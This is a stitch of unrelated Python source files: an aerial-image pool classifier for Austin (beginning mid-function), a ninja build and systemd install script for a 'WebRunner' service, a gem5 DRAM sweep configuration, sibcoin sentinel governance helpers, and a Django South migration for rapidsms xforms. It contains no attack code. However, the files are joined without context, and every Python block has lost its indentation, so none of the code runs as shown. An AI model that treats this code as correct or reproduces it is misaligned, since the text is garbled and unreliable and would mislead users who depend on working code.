lat2=hms_to_deg(30,12,32.97),
lon1=hms_to_deg(-97,50,33.81),
lon2=hms_to_deg(-97,38,12.31))
chunks=dict(atx=atx)
return chunks[name]
def label_data(prefix, size=100, savename=None):
from glob import glob
from os.path import basename
from PIL import Image
from os.path import isfile
if savename==None: savename=labelpath+'label_'+prefix+'.txt'
# We want to avoid labeling an image twice, so keep track
# of what we've labeled in previous labeling sessions.
if isfile(savename):
fileout = open(savename,'r')
already_seen = [line.split(',')[0] for line in fileout]
fileout.close()
else: already_seen = []
# Now reopen the file for appending.
fileout = open(savename,'a')
pl.ion()
pl.figure(1,figsize=(9,9))
files = glob(imgpath+prefix+'*.png')
for file in np.random.choice(files, size=size, replace=False):
if basename(file) in already_seen: continue
pl.clf()
pl.subplot(1,1,1)
pl.imshow(np.array(Image.open(file)))
pl.title(file)
pl.axis('off')
pl.draw()
label = get_one_char()
if label=='q': break
fileout.write(basename(file)+','+label+'\n')
print file,label
fileout.close()
return
def get_one_char():
import sys, tty, termios
fd = sys.stdin.fileno()
old_settings = termios.tcgetattr(fd)
try:
tty.setraw(sys.stdin.fileno())
ch = sys.stdin.read(1)
finally:
termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)
return ch
def is_number(s):
try:
float(s)
return True
except ValueError:
return False
def read_label(prefix):
savename = labelpath+'label_'+prefix+'.txt'
file=open(savename,'r')
n={}
for line in file:
tmp=line.split(',')
if is_number(tmp[1]): n[tmp[0]]=int(tmp[1])
else: n[tmp[0]]=0
file.close()
return n
def load_labeled(prefix='atx', nside=32, quick=False):
import cPickle as pickle
savename=basepath+'tmp_train_'+prefix+'_%i'%nside+'.pkl'
if quick:
X, y = pickle.load(open(savename,'r'))
return X, y
from PIL import Image
tmp=read_label(prefix)
X=[]; y=[]
for name,label in tmp.iteritems():
img_name = imgpath+name
img = Image.open(img_name)
if nside!=256: img=img.resize((nside,nside),Image.ANTIALIAS)
img = np.array(img)
if False:
print img.shape
pl.imshow(img)
pdb.set_trace()
X.append(img)
y.append(label>0)
X = np.array(X)
y = np.array(y).astype(int)
pickle.dump((X,y), open(savename, 'w'))
return X,y
def get_colors(name='pool',ncolors=10, quick=True):
import cPickle as pickle
savename = basepath+name+'.pkl'
if quick: return pickle.load(open(savename,'r'))
if name=='pool':
base_colors = [[154, 211, 210],
[104, 148, 156],
[70, 160, 162],
[93, 152, 140],
[58, 104, 99]]
colors=[];
for i in range(ncolors):
for base_color in base_colors:
colors.append(np.array(base_color)+np.random.randint(-30,high=20,size=3))
colors.append(np.random.randint(0,high=255,size=3))
pickle.dump(colors, open(savename,'w'))
return colors
def get_features(X_img, colors, thresh=30, ds=4):
nsamp=X_img.shape[0]
nside=X_img.shape[1]
features = []
for color in colors:
ok_color = np.product(np.abs(X_img - np.array(color))<thresh,axis=-1)
sm_ok_color = ok_color.reshape(nsamp,nside/ds,ds,nside/ds,ds).mean(4).mean(2)
max_sm = np.max(np.max(sm_ok_color,axis=-1),axis=-1)
sum_sm = np.sum(np.sum(sm_ok_color,axis=-1),axis=-1)
features.append(max_sm)
features.append(sum_sm)
features = np.vstack(features).T
return features
def train_classifier(prefix='atx', nside=32, ds=4, color_thresh=30, test_size=0.5):
X_img,y=load_labeled(prefix=prefix,nside=nside,quick=False)
if prefix=='atx': color_name='pool'
colors = get_colors(name=color_name, quick=True)
print '...getting features...'
X = get_features(X_img, colors, ds=ds, thresh=color_thresh)
print '...done getting features...'
from sklearn.ensemble import ExtraTreesClassifier, RandomForestClassifier
from sklearn.cross_validation import train_test_split
from sklearn import metrics
rf = ExtraTreesClassifier(n_estimators=200, n_jobs=6, max_features=0.02)
X_train, X_test, y_train, y_test, img_train, img_test = train_test_split(X,y,X_img,test_size=0.5)
print '...fitting...'
rf.fit(X_train, y_train)
y_proba = rf.predict_proba(X_test)[:,1]
fpr, tpr, thresholds = metrics.roc_curve(y_test, y_proba)
auc = metrics.auc(fpr, tpr)
pl.clf(); pl.plot(fpr, tpr, 'b-o')
pl.plot(fpr, fpr/np.mean(y), 'r--'); pl.ylim(0,1); pl.xlim(0,1)
pl.title('AUC: %0.3f'%auc)
for i,th in enumerate(thresholds): print th,tpr[i],tpr[i]/fpr[i]
prob_thresh=0.6
wh_missed=np.where((y_proba<prob_thresh)&(y_test==1))[0]
wh_ok=np.where((y_proba>prob_thresh)&(y_test==1))[0]
def iimshow(img):
pl.clf(); pl.imshow(np.array(img,dtype=np.uint8))
def predict_proba_all(classifier, colors, prefix='atx', batchsize=1000, nside=32):
from glob import glob
from PIL import Image
files = glob(imgpath+prefix+'*.png')
np.random.shuffle(files)
nfiles = len(files)
#nbatches=2 #tmpp
nbatches = np.ceil(1.*nfiles/batchsize).astype(int)
x=[]; y=[]; proba=[]
for ibatch in range(nbatches):
print ibatch,nbatches
imgs = []
imin=ibatch*batchsize
imax=np.min([(ibatch+1)*batchsize, nfiles])
# load and resize these images
for file in files[imin:imax]:
img = Image.open(file)
if nside!=256: img=img.resize((nside,nside),Image.ANTIALIAS)
img = np.array(img)
imgs.append(img)
xtmp, ytmp, ztmp = xyz_from_filename(file)
x.append(xtmp)
y.append(ytmp)
this_X = get_features(np.array(imgs), colors)
this_proba = classifier.predict_proba(this_X)[:,1]
proba.append(this_proba)
proba=np.hstack(proba)
x=np.array(x)
y=np.array(y)
return x,y,proba
def write_to_csv(xtile,ytile,proba, proba_cut=0.4):
wh=np.where(proba>proba_cut)[0]
print len(wh)
lat, lon = xyz_to_latlong(xtile[wh], ytile[wh], 19)
medx=int(np.median(xtile))
medy=int(np.median(ytile))
dlat, dlon = xyz_to_latlong(np.array([medx,medx+1]), np.array([medy,medy+1]), 19)
lat -= (0.5*(max(dlat)-min(dlat)))
lon += (0.5*(max(dlon)-min(dlon)))
file=open(prefix+'.csv','w')
file.write('lat,lon\n')
for this_lat, this_lon in zip(lat,lon):
file.write('%0.7f,%0.7f'%(this_lat, this_lon)+'\n')
file.close()
| |
#!/usr/bin/env python
from __future__ import print_function
import os
import sys
import glob
import argparse
import ninja_syntax
class Configuration:
def __init__(self, options):
self.root_dir = os.path.dirname(os.path.abspath(__file__))
self.source_dir = os.path.join(self.root_dir, "src")
self.build_dir = os.path.join(self.root_dir, "build")
self.artifact_dir = self.root_dir
self.writer = ninja_syntax.Writer(open(os.path.join(self.root_dir, "build.ninja"), "w"))
self.object_ext = ".o"
# Variables
cflags = ["-std=gnu11", "-g", "-Wall", "-Werror", "-Wno-error=unused-variable", "-fcolor-diagnostics"]
ldflags = ["-g", "-Wl,-fuse-ld=gold"]
self.writer.variable("cc", "clang")
self.writer.variable("cflags", " ".join(cflags))
self.writer.variable("ldflags", " ".join(ldflags))
self.writer.variable("optflags", "-O2")
self.writer.variable("includes", "-I" + self.source_dir)
self.writer.variable("python", "python")
self.writer.variable("spec_compiler", "$python " + os.path.join(self.root_dir, "tools", "spec-compiler.py"))
self.writer.variable("spec_collector", "$python " + os.path.join(self.root_dir, "tools", "spec-collector.py"))
if not sys.platform.startswith("linux"):
print("Unsupported platform: %s" % sys.platform, file=sys.stdout)
sys.exit(1)
# Rules
self.writer.rule("cc", "$cc -o $out -c $in -MMD -MF $out.d $optflags $cflags $includes",
deps="gcc", depfile="$out.d",
description="CC $descpath")
self.writer.rule("ccld", "$cc $ldflags $libdirs -o $out $in $libs",
description="CCLD $descpath")
self.writer.rule("spec-compile", "$spec_compiler $in --code $code --header $header",
description="COMPILE $descpath")
self.writer.rule("spec-collect", "$spec_collector $in --code $code --header $header",
description="COLLECT $descpath")
self.writer.rule("install", "install -m $mode $in $out",
description="INSTALL $descpath")
self.writer.rule("enable", "systemctl enable $service",
description="ENABLE $service")
self.writer.rule("start", "systemctl start $service",
description="START $service")
self.writer.rule("stop", "systemctl stop $service",
description="STOP $service")
def check(self):
"""Checks system requirements for WebRunner"""
import sys
if not sys.platform.startswith("linux"):
print("Unsupported platform %s: WebRunner is a Linux-only software" % sys.platform, file=sys.stdout)
sys.exit(1)
import platform
import re
kernel_version_match = re.match(r"\d+\.\d+\.\d+", platform.release())
if kernel_version_match:
kernel_release = tuple(map(int, kernel_version_match.group(0).split(".")))
if kernel_release < (3,17,):
print("Unsupported Linux kernel %s: WebRunner requires Linux 3.17+" % kernel_version_match.group(0))
sys.exit(1)
def cc(self, source_file, object_file=None):
if not os.path.isabs(source_file):
source_file = os.path.join(self.source_dir, source_file)
if object_file is None:
object_file = os.path.join(self.build_dir, os.path.relpath(source_file, self.source_dir)) + self.object_ext
elif not os.path.isabs(object_file):
object_file = os.path.join(self.build_dir, object_file)
variables = {
"descpath": os.path.relpath(source_file, self.source_dir)
}
self.writer.build(object_file, "cc", source_file, variables=variables)
return object_file
def ccld(self, object_files, executable_file):
if not os.path.isabs(executable_file):
executable_file = os.path.join(self.artifact_dir, executable_file)
variables = {
"descpath": os.path.relpath(executable_file, self.artifact_dir)
}
self.writer.build(executable_file, "ccld", object_files, variables=variables)
return executable_file
def spec_compile(self, spec_file, code_file=None, header_file=None):
if not os.path.isabs(spec_file):
spec_file = os.path.join(self.source_dir, spec_file)
if code_file is None:
code_file = os.path.splitext(spec_file)[0] + "-gen.c"
elif not os.path.isabs(code_file):
code_file = os.path.join(self.source_dir, code_file)
if header_file is None:
header_file = os.path.splitext(code_file)[0] + ".h"
elif not os.path.isabs(header_file):
header_file = os.path.join(self.source_dir, header_file)
variables = {
"descpath": os.path.relpath(spec_file, self.source_dir),
"code": code_file,
"header": header_file
}
self.writer.build([code_file, header_file], "spec-compile", spec_file, variables=variables)
return code_file, header_file
def spec_collect(self, spec_files, code_file, header_file):
spec_files = [f if os.path.isabs(f) else os.path.join(self.source_dir, f) for f in spec_files]
if not os.path.isabs(code_file):
code_file = os.path.join(self.source_dir, code_file)
if not os.path.isabs(header_file):
header_file = os.path.join(self.source_dir, header_file)
variables = {
"descpath": os.path.relpath(code_file, self.source_dir),
"code": code_file,
"header": header_file
}
self.writer.build([code_file, header_file], "spec-collect", spec_files, variables=variables)
return code_file, header_file
def install(self, local_path, system_path, mode="644"):
if not os.path.isabs(local_path):
local_path = os.path.join(self.root_dir, local_path)
variables = {
"mode": mode,
"descpath": os.path.relpath(local_path, self.root_dir)
}
self.writer.build(system_path, "install", local_path, variables=variables)
return system_path
def enable(self, deps, service, target_name="enable"):
self.writer.build(target_name, "enable", deps, variables=dict(service=service))
def start(self, deps, service, target_name="start"):
self.writer.build(target_name, "start", deps, variables=dict(service=service))
def stop(self, deps, service, target_name="stop"):
self.writer.build(target_name, "stop", deps, variables=dict(service=service))
def phony(self, name, targets):
if isinstance(targets, str):
targets = [targets]
self.writer.build(name, "phony", " & ".join(targets))
def default(self, target):
self.writer.default(target)
parser = argparse.ArgumentParser(description="WebRunner configuration script")
def main():
options = parser.parse_args()
config = Configuration(options)
kernel_specifications = []
kernel_objects = []
for source_dir, _, filenames in os.walk(os.path.join(config.source_dir, "kernels")):
for filename in filenames:
if os.path.basename(filename).startswith("."):
continue
fileext = os.path.splitext(filename)[1]
if fileext == ".xml":
specification_file = os.path.join(source_dir, filename)
gen_c_file, gen_h_file = config.spec_compile(specification_file)
gen_object = config.cc(gen_c_file)
kernel_specifications.append(specification_file)
kernel_objects.append(gen_object)
elif fileext == ".c" and not filename.endswith("-gen.c"):
kernel_objects.append(config.cc(os.path.join(source_dir, filename)))
config.spec_collect(kernel_specifications, "runner/spec.c", "runner/spec.h")
webserver_objects = [
config.cc("webserver/server.c"),
config.cc("webserver/request.c"),
config.cc("webserver/options.c"),
config.cc("webserver/logs.c"),
config.cc("webserver/http.c"),
config.cc("webserver/parse.c"),
]
runner_objects = [
config.cc("runner/perfctr.c"),
config.cc("runner/median.c"),
config.cc("runner/sandbox.c"),
config.cc("runner/loader.c"),
config.cc("runner/spec.c"),
]
webrunner = config.ccld(webserver_objects + runner_objects + kernel_objects, "webrunner")
config.default(webrunner)
webrunner_program = config.install(webrunner, "/usr/sbin/webrunner", mode="755")
webrunner_service = config.install("webrunner.service", "/etc/systemd/system/webrunner.service")
config.enable([webrunner_program, webrunner_service], "webrunner.service")
config.start([], "webrunner.service")
config.stop([], "webrunner.service")
config.phony("install", ["enable"])
if __name__ == "__main__":
sys.exit(main())
| |
# Copyright (c) 2014-2015 ARM Limited
# All rights reserved.
#
# The license below extends only to copyright in the software and shall
# not be construed as granting a license to any other intellectual
# property including but not limited to intellectual property relating
# to a hardware implementation of the functionality of the software
# licensed hereunder. You may use the software subject to the license
# terms below provided that you ensure that this notice is replicated
# unmodified and in its entirety in all distributions of the software,
# modified or unmodified, in source code or in binary form.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Andreas Hansson
import optparse
import m5
from m5.objects import *
from m5.util import addToPath
from m5.internal.stats import periodicStatDump
addToPath('../common')
import MemConfig
# this script is helpful to sweep the efficiency of a specific memory
# controller configuration, by varying the number of banks accessed,
# and the sequential stride size (how many bytes per activate), and
# observe what bus utilisation (bandwidth) is achieved
parser = optparse.OptionParser()
# Use a single-channel DDR3-1600 x64 by default
parser.add_option("--mem-type", type="choice", default="DDR3_1600_x64",
choices=MemConfig.mem_names(),
help = "type of memory to use")
parser.add_option("--mem-ranks", "-r", type="int", default=1,
help = "Number of ranks to iterate across")
parser.add_option("--rd_perc", type="int", default=100,
help = "Percentage of read commands")
parser.add_option("--mode", type="choice", default="DRAM",
choices=["DRAM", "DRAM_ROTATE"],
help = "DRAM: Random traffic; \
DRAM_ROTATE: Traffic rotating across banks and ranks")
parser.add_option("--addr_map", type="int", default=1,
help = "0: RoCoRaBaCh; 1: RoRaBaCoCh/RoRaBaChCo")
(options, args) = parser.parse_args()
if args:
print "Error: script doesn't take any positional arguments"
sys.exit(1)
# at the moment we stay with the default open-adaptive page policy,
# and address mapping
# start with the system itself, using a multi-layer 2.0 GHz
# crossbar, delivering 64 bytes / 3 cycles (one header cycle)
# which amounts to 42.7 GByte/s per layer and thus per port
system = System(membus = IOXBar(width = 32))
system.clk_domain = SrcClockDomain(clock = '2.0GHz',
voltage_domain =
VoltageDomain(voltage = '1V'))
# we are fine with 256 MB memory for now
mem_range = AddrRange('256MB')
system.mem_ranges = [mem_range]
# do not worry about reserving space for the backing store
system.mmap_using_noreserve = True
# force a single channel to match the assumptions in the DRAM traffic
# generator
options.mem_channels = 1
options.external_memory_system = 0
options.tlm_memory = 0
options.elastic_trace_en = 0
MemConfig.config_mem(options, system)
# the following assumes that we are using the native DRAM
# controller, check to be sure
if not isinstance(system.mem_ctrls[0], m5.objects.DRAMCtrl):
fatal("This script assumes the memory is a DRAMCtrl subclass")
# there is no point slowing things down by saving any data
system.mem_ctrls[0].null = True
# Set the address mapping based on input argument
# Default to RoRaBaCoCh
if options.addr_map == 0:
system.mem_ctrls[0].addr_mapping = "RoCoRaBaCh"
elif options.addr_map == 1:
system.mem_ctrls[0].addr_mapping = "RoRaBaCoCh"
else:
fatal("Did not specify a valid address map argument")
# stay in each state for 0.25 ms, long enough to warm things up, and
# short enough to avoid hitting a refresh
period = 250000000
# this is where we go off piste, and print the traffic generator
# configuration that we will later use, crazy but it works
cfg_file_name = "configs/dram/sweep.cfg"
cfg_file = open(cfg_file_name, 'w')
# stay in each state as long as the dump/reset period, use the entire
# range, issue transactions of the right DRAM burst size, and match
# the DRAM maximum bandwidth to ensure that it is saturated
# get the number of banks
nbr_banks = system.mem_ctrls[0].banks_per_rank.value
# determine the burst length in bytes
burst_size = int((system.mem_ctrls[0].devices_per_rank.value *
system.mem_ctrls[0].device_bus_width.value *
system.mem_ctrls[0].burst_length.value) / 8)
# next, get the page size in bytes
page_size = system.mem_ctrls[0].devices_per_rank.value * \
system.mem_ctrls[0].device_rowbuffer_size.value
# match the maximum bandwidth of the memory, the parameter is in seconds
# and we need it in ticks (ps)
itt = system.mem_ctrls[0].tBURST.value * 1000000000000
# assume we start at 0
max_addr = mem_range.end
# use min of the page size and 512 bytes as that should be more than
# enough
max_stride = min(512, page_size)
# now we create the state by iterating over the stride size from burst
# size to the max stride, and from using only a single bank up to the
# number of banks available
nxt_state = 0
for bank in range(1, nbr_banks + 1):
for stride_size in range(burst_size, max_stride + 1, burst_size):
cfg_file.write("STATE %d %d %s %d 0 %d %d "
"%d %d %d %d %d %d %d %d %d\n" %
(nxt_state, period, options.mode, options.rd_perc,
max_addr, burst_size, itt, itt, 0, stride_size,
page_size, nbr_banks, bank, options.addr_map,
options.mem_ranks))
nxt_state = nxt_state + 1
cfg_file.write("INIT 0\n")
# go through the states one by one
for state in range(1, nxt_state):
cfg_file.write("TRANSITION %d %d 1\n" % (state - 1, state))
cfg_file.write("TRANSITION %d %d 1\n" % (nxt_state - 1, nxt_state - 1))
cfg_file.close()
# create a traffic generator, and point it to the file we just created
system.tgen = TrafficGen(config_file = cfg_file_name)
# add a communication monitor
system.monitor = CommMonitor()
# connect the traffic generator to the bus via a communication monitor
system.tgen.port = system.monitor.slave
system.monitor.master = system.membus.slave
# connect the system port even if it is not used in this example
system.system_port = system.membus.slave
# every period, dump and reset all stats
periodicStatDump(period)
# run Forrest, run!
root = Root(full_system = False, system = system)
root.system.mem_mode = 'timing'
m5.instantiate()
m5.simulate(nxt_state * period)
print "DRAM sweep with burst: %d, banks: %d, max stride: %d" % \
(burst_size, nbr_banks, max_stride)
| |
import sys
import os
sys.path.append(os.path.join(os.path.dirname(__file__), '..'))
sys.path.append(os.path.join(os.path.dirname(__file__), '..', 'lib'))
import base58
import hashlib
import re
from decimal import Decimal
import simplejson
import binascii
from misc import printdbg, epoch2str
import time
def is_valid_dash_address(address, network='mainnet'):
raise RuntimeWarning('This method should not be used with sibcoin')
# Only public key addresses are allowed
# A valid address is a RIPEMD-160 hash which contains 20 bytes
# Prior to base58 encoding 1 version byte is prepended and
# 4 checksum bytes are appended so the total number of
# base58 encoded bytes should be 25. This means the number of characters
# in the encoding should be about 34 ( 25 * log2( 256 ) / log2( 58 ) ).
dash_version = 140 if network == 'testnet' else 76
# Check length (This is important because the base58 library has problems
# with long addresses (which are invalid anyway).
if ((len(address) < 26) or (len(address) > 35)):
return False
address_version = None
try:
decoded = base58.b58decode_chk(address)
address_version = ord(decoded[0:1])
except:
# rescue from exception, not a valid Dash address
return False
if (address_version != dash_version):
return False
return True
def is_valid_sibcoin_address(address, network='mainnet'):
# Only public key addresses are allowed
# A valid address is a RIPEMD-160 hash which contains 20 bytes
# Prior to base58 encoding 1 version byte is prepended and
# 4 checksum bytes are appended so the total number of
# base58 encoded bytes should be 25. This means the number of characters
# in the encoding should be about 34 ( 25 * log2( 256 ) / log2( 58 ) ).
dash_version = 125 if network == 'testnet' else 63
# Check length (This is important because the base58 library has problems
# with long addresses (which are invalid anyway).
if ((len(address) < 26) or (len(address) > 35)):
return False
address_version = None
try:
decoded = base58.b58decode_chk(address)
address_version = ord(decoded[0:1])
except:
# rescue from exception, not a valid Dash address
return False
if (address_version != dash_version):
return False
return True
def is_valid_address(address, network='mainnet'):
return is_valid_sibcoin_address(address, network)
def hashit(data):
return int(hashlib.sha256(data.encode('utf-8')).hexdigest(), 16)
# returns the masternode VIN of the elected winner
def elect_mn(**kwargs):
current_block_hash = kwargs['block_hash']
mn_list = kwargs['mnlist']
# filter only enabled MNs
enabled = [mn for mn in mn_list if mn.status == 'ENABLED']
block_hash_hash = hashit(current_block_hash)
candidates = []
for mn in enabled:
mn_vin_hash = hashit(mn.vin)
diff = mn_vin_hash - block_hash_hash
absdiff = abs(diff)
candidates.append({'vin': mn.vin, 'diff': absdiff})
candidates.sort(key=lambda k: k['diff'])
try:
winner = candidates[0]['vin']
except:
winner = None
return winner
def parse_masternode_status_vin(status_vin_string):
status_vin_string_regex = re.compile(r'CTxIn\(COutPoint\(([0-9a-zA-Z]+),\s*(\d+)\),')
m = status_vin_string_regex.match(status_vin_string)
# To Support additional format of string return from masternode status rpc.
if m is None:
status_output_string_regex = re.compile(r'([0-9a-zA-Z]+)-(\d+)')
m = status_output_string_regex.match(status_vin_string)
txid = m.group(1)
index = m.group(2)
vin = txid + '-' + index
if (txid == '0000000000000000000000000000000000000000000000000000000000000000'):
vin = None
return vin
def create_superblock(proposals, event_block_height, budget_max, sb_epoch_time):
from models import Superblock, GovernanceObject, Proposal
from constants import SUPERBLOCK_FUDGE_WINDOW
import copy
# don't create an empty superblock
if (len(proposals) == 0):
printdbg("No proposals, cannot create an empty superblock.")
return None
budget_allocated = Decimal(0)
fudge = SUPERBLOCK_FUDGE_WINDOW # fudge-factor to allow for slightly incorrect estimates
payments_list = []
for proposal in proposals:
fmt_string = "name: %s, rank: %4d, hash: %s, amount: %s <= %s"
# skip proposals that are too expensive...
if (budget_allocated + proposal.payment_amount) > budget_max:
printdbg(
fmt_string % (
proposal.name,
proposal.rank,
proposal.object_hash,
proposal.payment_amount,
"skipped (blows the budget)",
)
)
continue
# skip proposals if the SB isn't within the Proposal time window...
window_start = proposal.start_epoch - fudge
window_end = proposal.end_epoch + fudge
printdbg("\twindow_start: %s" % epoch2str(window_start))
printdbg("\twindow_end: %s" % epoch2str(window_end))
printdbg("\tsb_epoch_time: %s" % epoch2str(sb_epoch_time))
if (sb_epoch_time < window_start or sb_epoch_time > window_end):
printdbg(
fmt_string % (
proposal.name,
proposal.rank,
proposal.object_hash,
proposal.payment_amount,
"skipped (SB time is outside of Proposal window)",
)
)
continue
printdbg(
fmt_string % (
proposal.name,
proposal.rank,
proposal.object_hash,
proposal.payment_amount,
"adding",
)
)
payment = {
'address': proposal.payment_address,
'amount': "{0:.8f}".format(proposal.payment_amount),
'proposal': "{}".format(proposal.object_hash)
}
temp_payments_list = copy.deepcopy(payments_list)
temp_payments_list.append(payment)
# calculate size of proposed Superblock
sb_temp = Superblock(
event_block_height=event_block_height,
payment_addresses='|'.join([pd['address'] for pd in temp_payments_list]),
payment_amounts='|'.join([pd['amount'] for pd in temp_payments_list]),
proposal_hashes='|'.join([pd['proposal'] for pd in temp_payments_list])
)
proposed_sb_size = len(sb_temp.serialise())
# add proposal and keep track of total budget allocation
budget_allocated += proposal.payment_amount
payments_list.append(payment)
# don't create an empty superblock
if not payments_list:
printdbg("No proposals made the cut!")
return None
# 'payments' now contains all the proposals for inclusion in the
# Superblock, but needs to be sorted by proposal hash descending
payments_list.sort(key=lambda k: k['proposal'], reverse=True)
sb = Superblock(
event_block_height=event_block_height,
payment_addresses='|'.join([pd['address'] for pd in payments_list]),
payment_amounts='|'.join([pd['amount'] for pd in payments_list]),
proposal_hashes='|'.join([pd['proposal'] for pd in payments_list]),
)
printdbg("generated superblock: %s" % sb.__dict__)
return sb
# convenience
def deserialise(hexdata):
json = binascii.unhexlify(hexdata)
obj = simplejson.loads(json, use_decimal=True)
return obj
def serialise(dikt):
json = simplejson.dumps(dikt, sort_keys=True, use_decimal=True)
hexdata = binascii.hexlify(json.encode('utf-8')).decode('utf-8')
return hexdata
def did_we_vote(output):
from bitcoinrpc.authproxy import JSONRPCException
# sentinel
voted = False
err_msg = ''
try:
detail = output.get('detail').get('sibcoin.conf')
result = detail.get('result')
if 'errorMessage' in detail:
err_msg = detail.get('errorMessage')
except JSONRPCException as e:
result = 'failed'
err_msg = e.message
# success, failed
printdbg("result = [%s]" % result)
if err_msg:
printdbg("err_msg = [%s]" % err_msg)
voted = False
if result == 'success':
voted = True
# in case we spin up a new instance or server, but have already voted
# on the network and network has recorded those votes
m_old = re.match(r'^time between votes is too soon', err_msg)
m_new = re.search(r'Masternode voting too often', err_msg, re.M)
if result == 'failed' and (m_old or m_new):
printdbg("DEBUG: Voting too often, need to sync w/network")
voted = False
return voted
def parse_raw_votes(raw_votes):
votes = []
for v in list(raw_votes.values()):
(outpoint, ntime, outcome, signal) = v.split(':')
signal = signal.lower()
outcome = outcome.lower()
mn_collateral_outpoint = parse_masternode_status_vin(outpoint)
v = {
'mn_collateral_outpoint': mn_collateral_outpoint,
'signal': signal,
'outcome': outcome,
'ntime': ntime,
}
votes.append(v)
return votes
def blocks_to_seconds(blocks):
"""
Return the estimated number of seconds which will transpire for a given
number of blocks.
"""
return blocks * 2.62 * 60
| |
# encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
depends_on = (
("eav", "0001_initial"),
("rapidsms_httprouter", "0001_initial"),)
def forwards(self, orm):
# Adding model 'XForm'
db.create_table('rapidsms_xforms_xform', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(max_length=32)),
('keyword', self.gf('eav.fields.EavSlugField')(max_length=32, db_index=True)),
('description', self.gf('django.db.models.fields.TextField')(max_length=255)),
('response', self.gf('django.db.models.fields.CharField')(max_length=255)),
('active', self.gf('django.db.models.fields.BooleanField')(default=True)),
('command_prefix', self.gf('django.db.models.fields.CharField')(default='+', max_length=1, null=True, blank=True)),
('keyword_prefix', self.gf('django.db.models.fields.CharField')(max_length=1, null=True, blank=True)),
('separator', self.gf('django.db.models.fields.CharField')(max_length=8, null=True, blank=True)),
('restrict_message', self.gf('django.db.models.fields.CharField')(max_length=160, null=True, blank=True)),
('owner', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['auth.User'])),
('created', self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, blank=True)),
('modified', self.gf('django.db.models.fields.DateTimeField')(auto_now=True, blank=True)),
('site', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['sites.Site'])),
))
db.send_create_signal('rapidsms_xforms', ['XForm'])
# Adding M2M table for field restrict_to on 'XForm'
db.create_table('rapidsms_xforms_xform_restrict_to', (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('xform', models.ForeignKey(orm['rapidsms_xforms.xform'], null=False)),
('group', models.ForeignKey(orm['auth.group'], null=False))
))
db.create_unique('rapidsms_xforms_xform_restrict_to', ['xform_id', 'group_id'])
# Adding model 'XFormField'
db.create_table('rapidsms_xforms_xformfield', (
('attribute_ptr', self.gf('django.db.models.fields.related.OneToOneField')(to=orm['eav.Attribute'], unique=True, primary_key=True)),
('xform', self.gf('django.db.models.fields.related.ForeignKey')(related_name='fields', to=orm['rapidsms_xforms.XForm'])),
('field_type', self.gf('django.db.models.fields.SlugField')(db_index=True, max_length=8, null=True, blank=True)),
('command', self.gf('eav.fields.EavSlugField')(max_length=32, db_index=True)),
('order', self.gf('django.db.models.fields.IntegerField')(default=0)),
('question', self.gf('django.db.models.fields.TextField')(null=True, blank=True)),
))
db.send_create_signal('rapidsms_xforms', ['XFormField'])
# Adding model 'XFormFieldConstraint'
db.create_table('rapidsms_xforms_xformfieldconstraint', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('field', self.gf('django.db.models.fields.related.ForeignKey')(related_name='constraints', to=orm['rapidsms_xforms.XFormField'])),
('type', self.gf('django.db.models.fields.CharField')(max_length=10)),
('test', self.gf('django.db.models.fields.CharField')(max_length=255, null=True)),
('message', self.gf('django.db.models.fields.CharField')(max_length=160)),
('order', self.gf('django.db.models.fields.IntegerField')(default=1000)),
))
db.send_create_signal('rapidsms_xforms', ['XFormFieldConstraint'])
# Adding model 'XFormSubmission'
db.create_table('rapidsms_xforms_xformsubmission', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('xform', self.gf('django.db.models.fields.related.ForeignKey')(related_name='submissions', to=orm['rapidsms_xforms.XForm'])),
('type', self.gf('django.db.models.fields.CharField')(max_length=8)),
('connection', self.gf('django.db.models.fields.related.ForeignKey')(related_name='submissions', null=True, to=orm['rapidsms.Connection'])),
('raw', self.gf('django.db.models.fields.TextField')()),
('has_errors', self.gf('django.db.models.fields.BooleanField')(default=False)),
('created', self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, blank=True)),
('confirmation_id', self.gf('django.db.models.fields.IntegerField')(default=0)),
('message', self.gf('django.db.models.fields.related.ForeignKey')(related_name='submissions', null=True, to=orm['rapidsms_httprouter.Message'])),
))
db.send_create_signal('rapidsms_xforms', ['XFormSubmission'])
# Adding model 'XFormSubmissionValue'
db.create_table('rapidsms_xforms_xformsubmissionvalue', (
('value_ptr', self.gf('django.db.models.fields.related.OneToOneField')(to=orm['eav.Value'], unique=True, primary_key=True)),
('submission', self.gf('django.db.models.fields.related.ForeignKey')(related_name='values', to=orm['rapidsms_xforms.XFormSubmission'])),
))
db.send_create_signal('rapidsms_xforms', ['XFormSubmissionValue'])
